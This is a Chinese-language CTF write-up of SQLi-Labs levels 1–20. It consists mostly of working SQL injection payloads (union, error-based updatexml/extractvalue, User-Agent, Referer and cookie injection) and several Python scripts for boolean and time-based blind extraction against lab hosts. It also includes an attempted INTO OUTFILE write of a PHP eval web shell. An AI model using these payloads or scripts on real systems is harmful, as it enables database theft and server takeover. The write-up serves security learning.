SQLILABS穿关记录
注:本文脚本需要根据自身情况修改
第一关
?id=1’ or 1=1 %23 //字符型注入
?id=1’ or 1=1 union select 1,2,3,4%23 //报错字段为3
?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //爆全部库
库名 challenges,ctftraining,information_schema,mysql,performance_schema,security,test
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘ctftraining’%23 //查库
?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘flag’%23 //查水表
?id=-1’ union select 1,2,flag from ctftraining.flag%23 //跨库查询
第二关
?id=1’ or 1=1 # 报错’ or 1=1 LIMIT 0,1 考虑数字型注入
?id=1 or 1=1 //成功为数字型注入
?id=-1 union select 1,2,flag from ctftraining.flag%23
接下来的步骤和第一关一样
第三关
?id=1’)or 1=1 # //接下来应该一样
?id=-1’) union select 1,2,flag from ctftraining.flag%23
第四关
?id=1“)or 1=1 # //接下来应该一样
?id=-1") union select 1,2,flag from ctftraining.flag%23
第五关
报错注入也行
?id=2’and 1=1 %23
?id=2’and 1=2 %23无回显
贴上我的脚本
import requests
import time
url = "http://46be5e92-e82c-4f5b-a5b9-5a6fa17b8493.node4.buuoj.cn/Less-5/?id=2 'and "
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# payload="if(ascii(substr(database(),{},1))>{},1,0) %23".format(i,mid) #查所在库
# payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) %23".format(i,mid) #查全部库
# payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) %23".format(i,mid) #查水表名
# payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) %23".format(i,mid) #查水表
payload="if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) %23".format(i,mid) #爆flag
# print(url+payload)
r=requests.get(url+payload)
# print(r.text)
time.sleep(1) #buu蛋疼的限制所限制
if "You are in..........." in r.text:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
第六关
脚本中url的 ‘ 改 \“ 就行了
第七关
到第一关查路径先
?id=-1’union select 1,@@basedir,@@datadir %23
Your Login name:/usr
Your Password:/var/lib/mysql/
emmmm网站路径写不进去????
上面那个貌似不是路径
记录一下还没写出来
语句是union select 1,2,’<?php @eval($_POST[a]);?>'into outfile ‘路径’
第八关
第五个脚本可以用
第九关
判断闭合 and if(1=2,1,sleep(10)) # 看刷新时间
一般闭合为 ’ " ') ")多试试加括号。。。应该是这样
时间盲注
贴给脚本
import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-9/?id=2 'and "
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
payload="if(ascii(substr(database(),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
# payload="if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(1),0) %23".format(i,mid)
# print(url+payload)
start_time=time.time()
r=requests.get(url+payload)
#print(r.text)
if time.time()-start_time>=1:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
第十关
把上面payload的’改为"
第十一关
跟第一关一样,只是改了请求方式
字段改了为2 其中%23改为# 不需要编码了
-1’ union select 1,flag from ctftraining.flag #
第十二关
跟第十一关一样,把’改为”)
-1") union select 1,flag from ctftraining.flag#
第十三关
post类型盲注,还好学了一丢丢爬虫
这边贴个脚本。。。在前几个脚本基础上做的修改
import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-13/"
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# data={"uname": "1') or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
# data={"uname": "1') or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
# data={"uname": "1') or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
data={"uname": "1') or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
r=requests.post(url=url,data=data)
# print(r.text)
time.sleep(1)
if "flag.jpg" in r.text:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
第十四关
把上面中的 ') 换成 "
第十五关
判断闭合’ or if(1=2,1,sleep(10)) #
时间盲注POST版
贴上我的脚本
import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-15/"
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# data={"uname": "1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) #".format(i,mid),"passwd": 1}
# data={"uname": "1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
# data={"uname": "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
# data={"uname": "1' or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
data={"uname": "1' or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
start_time=time.time()
r=requests.post(url=url,data=data)
#print(r.text)
if time.time()-start_time>=1:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
第十六关
判断闭合 ")or if(1=2,1,sleep(10)) #
把上面脚本的 ‘ 改为 ")
第十七关
username必须得admin才行,没想到。。靠!!!
报错注入
1’ or updatexml(1,concat(0x26,database(),0x26),1)#
1’ or updatexml(1,concat(0x26,database(),0x26),1)#
1’ or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1’ or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
左右拼接一下就是库名
····中间差不多不多赘述了
1’ or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1)#
1’ or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1)#
左右拼接一下就是flag
另一个函数 注:该函数一次只能查询32位长度
extractvalue(1,concat(0x26,(SQL语句),0x26));
第十八关
把UA换成 ’ or updatexml(1,concat(0x26,database(),0x26),1)and’
应该是后面还有语句,没想到。。。看看源码
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)//登录成功
{
//将用户的uagent,ip,uname插入到一张表中
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert); //进行插入数据
echo 'Your User Agent is: ' .$uagent;
print_r(mysql_error()); //输出详细错误
}
else
{
echo '<font color= "#0000ff" font size="3">';
print_r(mysql_error()); //输出详细错误
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
果然是
’ or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1) and ’
’ or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1) and ’
读取flag
第十九关
改referer和上面一样
第二十关
这个不看源码做不了吧。。。。。
//uname和passwd都做了过滤,而cookie没有,直接获取
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
//存在一个跟cookie相关的sql语句操作,由于未进行任何过滤,所以存在cookie注入
buu没有回显。。。。
ctfshow有。。。
常规注入
不做赘述
查看17题